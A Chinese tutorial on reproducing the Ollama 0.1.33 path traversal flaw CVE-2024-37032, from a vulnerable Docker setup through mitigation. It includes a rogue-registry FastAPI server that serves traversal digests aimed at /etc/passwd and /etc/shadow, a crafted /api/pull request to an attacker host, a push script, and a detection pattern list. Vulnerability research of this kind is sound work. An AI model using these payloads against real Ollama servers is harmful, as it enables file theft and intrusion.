当前位置：首页 > article >正文

手把手复现Ollama 0.1.33的RCE漏洞（CVE-2024-37032），从Docker搭建到PoC利用

article 2026/3/22 17:06:02

深入剖析Ollama 0.1.33路径遍历漏洞CVE-2024-37032的实战复现指南在本地运行大型语言模型已成为当前AI应用开发的热点需求Ollama作为一款轻量级工具链因其开箱即用的特性备受开发者青睐。然而近期披露的CVE-2024-37032漏洞暴露了其早期版本存在的严重安全缺陷——攻击者可通过精心构造的模型清单文件实现任意文件读写。本文将带领读者从零搭建漏洞环境逐步拆解漏洞原理最终完成完整的漏洞利用链复现。1. 漏洞环境构建1.1 准备实验环境建议使用隔离的Linux虚拟机或云服务器进行测试确保主机系统不受影响。实验所需基础组件包括Docker Engine 20.10Python 3.8环境至少4GB可用内存# 验证Docker环境 docker --version # 输出示例Docker version 24.0.5, build ced09961.2 部署漏洞版本OllamaOllama 0.1.33的官方镜像仍可在Docker Hub获取但需注意该版本已标记为不安全docker pull ollama/ollama:0.1.33 docker run -d \ -v ollama_data:/root/.ollama \ -p 11434:11434 \ --name vulnerable_ollama \ ollama/ollama:0.1.33验证服务是否正常启动curl http://localhost:11434/api/tags # 正常应返回空列表{models:[]}2. 漏洞原理深度解析2.1 清单文件处理机制缺陷Ollama的模型分发采用类似Docker Registry的manifest v2格式关键漏洞点在于digest字段的路径校验逻辑。正常情况下的模型清单结构应包含{ schemaVersion: 2, config: { digest: sha256:abc123..., size: 1024 }, layers: [ { digest: sha256:def456..., size: 2048 } ] }漏洞版本未对digest值进行规范化处理导致攻击者可以注入包含路径遍历序列如../../../../etc/passwd的恶意值。2.2 请求处理流程缺陷当Ollama处理/api/pull请求时其内部工作流程存在以下问题未验证远程registry的可信度即使insecurefalse直接使用manifest中的digest值拼接本地文件路径缺少对写入位置的权限检查3. 漏洞利用实战3.1 搭建恶意Registry使用Python FastAPI快速搭建伪装的模型仓库from fastapi import FastAPI, Request, Response app FastAPI() app.get(/v2/rogue/model/manifests/latest) async def malicious_manifest(): return { config: { digest: ../../../../../../etc/passwd, size: 10 }, layers: [ { digest: ../../../../../../etc/shadow, size: 10 } ] }启动服务uvicorn exploit_server:app --host 0.0.0.0 --port 80003.2 触发文件读取构造特殊的pull请求触发漏洞curl -X POST http://localhost:11434/api/pull \ -H Content-Type: application/json \ -d {name:attacker-ip:8000/rogue/model,insecure:true}此时观察Ollama容器的日志可以看到其尝试访问系统敏感文件docker logs vulnerable_ollama # 将显示文件访问错误日志3.3 利用链增强通过组合push和pull操作可以实现更复杂的攻击场景先push精心构造的模型到漏洞主机再pull该模型触发二次漏洞利用最终实现持久化后门植入# 恶意模型push脚本示例 import requests headers {Content-Type: application/json} data {name: localhost:11434/evil/model, insecure: True} response requests.post(http://localhost:11434/api/push, jsondata, headersheaders) print(response.text)4. 防御与修复方案4.1 官方修复措施Ollama在0.1.34版本中实施了多重防护严格校验digest格式必须符合SHA256哈希格式规范化所有文件路径访问增加registry白名单机制升级命令docker pull ollama/ollama:latest docker stop vulnerable_ollama docker rm vulnerable_ollama # 重新启动新版本容器4.2 临时缓解方案若无法立即升级可采取以下措施限制Ollama服务的网络访问启用SELinux/AppArmor等强制访问控制定期审计/root/.ollama目录下的文件变更# 使用inotify监控关键目录 sudo apt install inotify-tools inotifywait -m -r /root/.ollama5. 漏洞研究进阶方向对于希望深入研究的读者建议探索以下方向漏洞变种挖掘测试其他API端点的路径处理逻辑尝试不同编码方式的路径遍历payload影响范围评估分析Windows平台下的利用差异研究容器逃逸的可能性检测方案开发编写YARA规则检测恶意模型文件开发实时监控插件# 简易模型文件检测脚本 import json def check_manifest_safety(manifest_path): with open(manifest_path) as f: data json.load(f) dangerous_patterns [../, ~/, /etc/, /root/] manifest_str json.dumps(data) return not any(pattern in manifest_str for pattern in dangerous_patterns)在实际测试环境中建议使用虚拟机快照功能保存各个阶段的系统状态便于反复验证不同攻击场景。同时务必注意所有实验都应在授权环境下进行避免对生产系统造成影响。

手把手复现Ollama 0.1.33的RCE漏洞（CVE-2024-37032），从Docker搭建到PoC利用

相关文章：

手把手复现Ollama 0.1.33的RCE漏洞（CVE-2024-37032），从Docker搭建到PoC利用

实测才敢推一键生成论文工具千笔 VS 学术猹全行业通用

从零构建RAGFlow全栈应用：React前端与Python API的实战对接

救命神器！全行业通用AI论文平台，千笔AI VS 灵感风暴AI

别再死记公式了！用Multisim仿真+实物测量，5分钟搞懂运放差分放大电路

飞猪酒店API避坑指南：rateplan与库存管理的那些细节

智能Agent新能力：集成BERT文本分割处理复杂用户查询

永磁同步电机SVPWM算法下脉冲电池加热算法仿真Simulink模型探究

Comsol热电效应仿真模型：温度场与电流场耦合计算，精准分析温度、电势与电场分布

感应加热仿真：当电磁场和温度场搞起联动

星露谷物语无头服务器搭建：从零到一构建专属联机农场

智能水产养殖系统-PyQt5-YOLOv8鱼类尺寸自动检测与Modbus数据交互方案

OpenPose vs MediaPipe：姿态识别算法选型指南（含性能对比）

倒立摆这玩意儿在控制领域算是个经典玩具，今天咱们用MATLAB整点有意思的——用LQR同时实现小车的平衡控制和外加摆杆起摆。先来点硬核的，直接上状态方程

打卡信奥刷题（2996）用C++实现信奥题 P6148 [USACO20FEB] Swapity Swapity Swap S

从AntSword抓包看一句话木马：为什么你的webshell能被安全工具检测到？

SmolVLA模拟技术面试官：动态追问与深度评估展示

nlp_structbert_sentence-similarity_chinese-large助力内容社区：CSDN博客相似文章推荐

MedCLIP：解锁医学多模态对比学习的数据效率与语义精准度

VL53L0X激光测距模块的四种工作模式详解：如何根据场景选择最佳模式

Android蓝牙遥控按键适配全攻略：从kl文件修改到KeyEvent映射

计算机毕业设计springboot智慧城市物业管理系统基于Spring Boot的智慧社区综合服务平台设计与实现基于Java Web的数字化小区物业运营管理系统开发

计算机毕业设计springboot小区服务平台管理设计与开发基于SpringBoot的智慧社区综合管理系统设计与实现微服务架构下住宅小区数字化服务平台构建研究

从Mask2Former到ONNX：实战部署与疑难排错指南

自适应惩罚因子调整（伪代码）

魔搭社区vs HuggingFace：国内开发者下载Qwen2-7B的最快姿势

Handling of user login failure

Traffic Accidents 2026.03.22

Java 数据 01：MyBatis-Plus 复杂查询（Lambda+Wrapper 多条件）

HTML + CSS + JavaScript 快速入门（三）：JS 与 jQuery 实战